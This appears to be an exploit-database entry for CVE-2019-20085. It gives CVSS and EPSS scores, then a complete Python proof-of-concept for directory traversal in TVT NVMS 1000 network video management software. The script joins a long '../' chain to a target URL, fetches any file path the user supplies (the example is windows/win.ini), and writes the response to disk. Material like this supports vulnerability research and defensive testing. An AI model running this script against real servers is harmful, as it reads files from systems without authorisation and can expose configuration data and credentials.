CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS
Percentile: 97.9%

# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import time

# Expect exactly three arguments: base URL, file to request, local output name
if len(sys.argv) != 4:
    print(" ")
    print("Usage : python exploit.py url filename outputname")
    print("Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini")
    print(" ")
else:
    # Repeated parent-directory segments appended to the base URL
    traversal = "../../../../../../../../../../../../../"
    filename = sys.argv[2]
    url = sys.argv[1] + traversal + filename
    outputname = sys.argv[3]
    content = requests.get(url)
    if content.status_code == 200:
        print(" ")
        print("Directory Traversal Succeeded")
        time.sleep(3)
        print(" ")
        print("Saving Output")
        # Write the response body directly rather than shelling out to `touch`
        with open(outputname, "w") as output_write:
            output_write.write(content.text)
    else:
        print("Host not vulnerable to Directory Traversal!")